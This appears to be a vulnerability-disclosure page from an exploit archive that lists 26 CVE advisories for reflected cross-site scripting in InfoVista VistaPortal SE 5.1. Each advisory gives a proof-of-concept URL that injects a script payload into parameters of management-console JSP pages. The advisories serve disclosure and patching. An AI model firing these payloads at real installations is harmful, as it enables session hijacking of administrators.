Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766, CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770, CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774, CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811, CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815, CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819, CVE-2018-19820, CVE-2018-19821, CVE-2018-19822 <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19649 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19765 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName, GroupId and ParentId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0 '"><ScRiPt>alert("xss")</ScRiPt>&type=U http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159 '"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0 http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0 Vulnerable parameter: ConnPoolName, GroupId and ParentId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19766 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security Resources&loginPath=_VP_Configuration,_VP_Security_Resources Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19767 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page Packages,InfoVista Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page Packages,InfoVista Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package Vulnerable parameters: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19768 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page Packages&loginPath=PagePackageMainFolder http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page Packages&loginPath=PagePackageMainFolder Vulnerable parameters: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19769 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "UserProperties.jsp" has reflected XSS via ConnPoolName. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User Properties&loginPath=_VP_Configuration,_VP_User_Propertie Vulnerable parameters: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19770 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "Users.jsp" has reflected XSS via ConnPoolName. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups Vulnerable parameters: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19771 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r) Database Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection Vulnerable parameter: PropName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19772 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName, GroupId and ParentId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0 '"><ScRiPt>alert("xss")</ScRiPt>&type=U http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4 '"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0 http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0 Vulnerable parameter: ConnPoolName, GroupId and ParentId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19773 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "EditCurrentUser.jsp" has reflected XSS via GroupId and ConnPoolName parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super Administrator&loginPath=All,_superadmin_shadow_ http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super Administrator&loginPath=All,_superadmin_shadow_ Vulnerable parameter: GroupId and ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19774 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4 '"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U Vulnerable parameter: GroupId and ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19775 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4 '"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo Vulnerable parameter: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19809 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via ConnPoolName, GroupId and type parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt> http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159 '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P '"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default Vulnerable parameter: ConnPoolName, GroupId and type 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19810 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via ConnPoolName, GroupId and type parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt> http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P '"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default Vulnerable parameter: ConnPoolName and type 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19811 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159 Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19812 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via GroupId parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5 '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F Vulnerable parameter: GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19813 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=P http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159 '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P Vulnerable parameter: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19814 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P '"><ScRiPt>alert("xss")</ScRiPt> http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=P http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159 '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P Vulnerable parameter: ConnPoolName, GroupId and type 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19815 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt> Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19816 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt> Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19817 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4 '"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U Vulnerable parameter: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19818 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19819 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19820 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19821 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via ConnPoolName parameter. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U Vulnerable parameter: ConnPoolName 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build 51029) # Date: 28-11-2018 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.infovista.com # Software Link: http://www.infovista.com # Version: VistaPortal SE Version 5.1 (build 51029) # Tested on: all # CVE : CVE-2018-19822 # Category: webapps 1. Description Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via ConnPoolName and GroupId parameters. 2. Proof of Concept http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName= '"><ScRiPt>alert("xss")</ScRiPt>&type=U http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4 '"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U Vulnerable parameter: ConnPoolName and GroupId 3. Solution: Solutions in next versions this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top